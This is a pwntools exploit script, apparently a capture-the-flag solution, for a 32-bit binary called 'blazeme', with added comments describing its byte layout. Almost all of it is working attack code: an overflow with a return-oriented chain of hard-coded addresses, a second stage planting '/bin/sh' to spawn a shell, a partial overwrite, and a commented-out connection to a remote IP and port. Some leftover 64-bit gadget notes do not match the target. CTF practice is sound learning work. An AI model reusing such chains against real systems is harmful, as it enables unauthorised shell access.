# Pastebin'd CTF exploit script for a 32-bit x86 binary ("./blazeme"),
# written against pwntools on Python 2 (str payloads, `raw_input`, and a
# `print` statement in a comment). Nothing on this page documents what the
# hard-coded 0x804xxxx addresses are; the comments below only describe the
# byte layout that the code itself establishes.
from pwn import *
import time  # unused in this script
context.arch='i386'
context.bits=32
# 'debug' makes pwntools hex-dump every byte sent and received, which is
# how scripts like this are usually traced while being developed.
context.log_level='debug'
# ASLR is turned off for the local target; every address below is absolute,
# so the script only works under that assumption (or against a non-PIE
# binary whose data/text addresses match).
r=process("./blazeme",aslr=False)

#r=remote("139.180.145.209",7492)
# gdb.attach(r,"""
#   b  * 0x080484ac

#   c
#   """)
#print r.recv()
# NOTE(review): the four gadget notes below name 64-bit registers
# (rsi/rdi/rcx) at 0x4xxxxx addresses, while this script targets i386 and
# none of these values appear in the payloads — presumably left over from
# a different challenge.
#0x0000000000410493 : pop rsi ; ret
#0x0000000000400676 : pop rdi ; ret
#0x0000000000417cc3 : pop rcx ; ret
#0x0000000000435c1b : mov word ptr [rdi], cx ; ret

# Stage 1: 0x64 (100) bytes of filler followed by eight little-endian
# 32-bit words, 132 bytes in total, sent without a trailing newline.
payload="1"*0x64
#0x0804858f : xor byte ptr [edx], al ; dec eax ; push cs ; adc al, 0x41 ; ret
#stage 1 mov to buffer

payload+=p32(0x1000)

payload+=p32(0x804a900)

payload+=p32(0x804a900)

payload+=p32(0x0804843D)
payload+=p32(0)
payload+=p32(0x804a800)
payload+=p32(0x1000)
payload+=p32(0x0804843D)
r.send(payload)
# Manual pause so the operator can attach a debugger between stages (the
# gdb.attach call above is commented out).
raw_input()
# Stage 2: the first 0x100 bytes are 240 NULs, "/bin/sh\0" (8 bytes) and
# two copies of p32(0x080482ce); nine more words follow, and sendline
# appends "\n". The string "/bin/sh" is therefore placed at a fixed offset
# inside this buffer, matching the author's "#binsh=" note below.
payload1="\x00"*(0x100-16)+"/bin/sh\x00"+p32(0x080482ce)*2+p32(0x804a8fc)
payload1+=p32(0x080482F0 )
payload1+=p32(0x080484ac  )
payload1+=p32(0)
payload1+=p32(0x804a00c-10)
payload1+=p32(0x804a92c)
payload1+=p32(2)
payload1+=p32(0x080482d1)
payload1+=p32(0x804a8f0)
payload1+=p32(0x080482F0)
#binsh=0x804a8f0
r.sendline(payload1)
raw_input()
# Stage 3: 11 bytes (ten NULs then 0xd0), sent without a newline.
payload2='\x00'*10+'\xd0'
r.send(payload2)
# Hand the connection over to the operator's terminal.
r.interactive()